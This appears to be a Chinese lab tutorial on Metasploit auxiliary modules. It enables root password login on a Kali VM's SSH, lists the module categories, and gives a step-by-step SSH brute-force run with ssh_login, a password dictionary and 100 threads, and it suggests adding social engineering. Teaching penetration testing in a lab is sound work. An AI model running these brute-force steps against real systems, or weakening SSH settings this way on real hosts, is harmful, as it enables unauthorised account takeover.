auxiliary
一、操作环境
虚拟机Kali(IP:192.168.1.92)
# 为方便学习开启ssh端口
# 进入ssh配置文件
》》vi /etc/ssh/sshd_config
将#PasswordAuthentication no的注释去掉,并且将NO修改为YES (//kali中默认是yes)
将permitrootlogin without-password修改为
PermitRootLogin yes
# 保存退出
》》service ssh start(启动ssh服务)
二、步骤了解
1.查看模块
# 启动msf
》》msfconsole
》》use auxiliary/【使用auxiliary模块,按两下Tab键,可以看到该模块下所有的可用模块项】
[由于模块太多,我直接整理以下项:]
/admin/Android ~
/admin/http ~
/admin/mysql/ ~
/admin/oracle/ ~
/admin/vmware/ ~
/admin/smb/ ~
/dos/android/ ~
/dos/http/ ~
/dos/cisco/ ~
/dos/dns/ ~
/dos/smb/ ~
/dos/windows/ftp/ ~
/fuzzers/http/ ~
/fuzzers/smb/ ~
/gather/ ~
/scanner/portscan/ ~
/scanner/ftp/ ~
/scanner/http/ ~
/scanner/ssh/ ~
/scanner/smb/ ~
/scanner/vmware/ ~
/scanner/vnc/ ~
/scanner/telnet/~
/scanner/msyql/ ~
/scanner/ntp/ ~
/scanner/openvas/ ~
/scanner/sap/ ~
/server/ ~
[以下为主要的嗅探模块]
Port scan: auxiliary/scanner/portscan/syn
Smb scan: auxiliary/scanner/smb/smb_version
Ftp scan: auxiliary/scanner/ftp/ftp_login
Ssh scan: auxiliary/scanner/ssh/ssh_login
SQLServer: auxiliary/scanner/mysql/mysql_login&mysql_hashdump……
2.调用模块
[这里我拿嗅探扫描中的ssh模块来举例,了解大致怎么用]
# 调用auxiliary下的ssh模块
》》use /auxiliary/scanner/ssh/ssh_login
3.模块参数查看、设置
》》options
[其中required中的yes是必须设定的]
》》set RHOSTS 192.168.1.92 (设定目标IP)
》》set USERNAME root (设定ssh登陆账户)
》》set PASS_FILE /kevin/ssh_passwd.txt (设定暴力字典)
》》set THREADS 100 (线程设置为100)
》》options (查看更改后的参数)
4.发起攻击
》》exploit
【以上可以看出被攻击者的ssh登陆账户密码,密码破解的难易程度取决于密码字典的广度,一般还是结合社工来实现完美破解的】
【以上对辅助扫描工具auxiliary模块的讲解!网络攻防的世界里只有技术高低,没有其它!】
相关阅读
原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。 msfvenom命令行选项如下:
使用metasploit(MSF)对windows的ms12-020漏洞进行利用
前言 攻击者向受影响的系统发送一系列特制 RDP 数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码。默认情况下,任何 Wind